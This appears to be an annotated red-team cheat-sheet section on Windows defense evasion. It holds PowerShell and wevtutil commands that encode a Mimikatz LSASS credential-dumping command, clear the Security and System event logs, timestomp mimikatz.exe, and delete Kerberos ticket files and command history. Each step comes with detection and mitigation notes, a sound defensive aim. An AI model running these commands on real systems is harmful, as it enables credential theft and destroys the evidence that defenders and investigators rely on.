
🥷 Defense Evasion

🎭 Obfuscation Methods

# Base64 encode commands
# Builds a Base64 string from a fixed command string; nothing is executed in
# these three lines, and the page does not show how $encoded is consumed.
# The literal holds two Mimikatz module commands (privilege::debug,
# sekurlsa::logonpasswords), i.e. the payload being hidden is LSASS credential
# dumping.
# Detection: Base64 only defeats matching on the literal text. Where the value
# is run through PowerShell, Script Block Logging (event ID 4104) and AMSI see
# the decoded content; long Base64 arguments on a process command line
# (event ID 4688 with command-line auditing, or Sysmon event ID 1) are a
# signal in their own right.
# Mitigation: LSA protection (RunAsPPL) and Credential Guard limit what an
# LSASS read can return, independent of how the command was encoded.
$command = '"privilege::debug" "sekurlsa::logonpasswords"'
# [System.Text.Encoding]::Unicode is UTF-16LE, so the decoded bytes carry a
# 0x00 after every ASCII character; decoders in a detection pipeline need to
# handle that encoding, not UTF-8.
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)

🧹 Cleanup

# Clear event logs
# Empties the local Security and System event logs with wevtutil's clear-log
# subcommand (cl). Both calls need administrative rights.
# Detection: clearing the Security log writes event ID 1102 ("The audit log
# was cleared") into the freshly emptied Security log; clearing another log
# writes event ID 104 to the System log. Process-creation telemetry for
# wevtutil.exe with "cl" / "clear-log" (event ID 4688 with command line, or
# Sysmon event ID 1) covers the attempt itself.
# Mitigation: forward events off-host (Windows Event Forwarding or a SIEM
# agent) so that a local clear cannot remove the earlier records.
wevtutil cl Security
wevtutil cl System

# Timestomp files
# Overwrites the LastWriteTime of C:\temp\mimikatz.exe with a fixed date in
# 2019. Only the last-write value is touched on this line; creation and
# last-access times are left as they were.
# Detection: a change made through the file API like this is reflected in the
# NTFS $STANDARD_INFORMATION attribute, while $FILE_NAME timestamps are
# normally maintained by the file system itself, so MFT analysis that compares
# the two attributes can expose the mismatch. The USN change journal and a
# last-write time earlier than the creation time are further indicators.
# NOTE(review): Sysmon event ID 2 reports creation-time changes, so it should
# not be relied on for a last-write change like this one - confirm against
# the deployed Sysmon configuration.
$(Get-Item C:\temp\mimikatz.exe).LastWriteTime = $(Get-Date "01/01/2019 12:00:00")

# Remove artifacts
# Deletes every *.kirbi file in C:\temp (.kirbi is the file format Mimikatz
# uses for exported Kerberos tickets) and then the PSReadLine command-history
# file for the current user.
# Detection: file-delete telemetry (Sysmon event IDs 23 / 26, where
# configured) records both removals. The matching ticket requests remain in
# the domain controller's Security log (event IDs 4768 / 4769) regardless of
# what is deleted on the workstation.
Remove-Item -Path C:\temp\*.kirbi -Force
# HistorySavePath is the PSReadLine history file (ConsoleHost_history.txt by
# default). Removing it does not affect Script Block Logging (event ID 4104)
# or PowerShell transcription, which are written elsewhere; a missing or
# freshly recreated history file on an actively used host is itself worth
# alerting on.
Remove-Item (Get-PSReadlineOption).HistorySavePath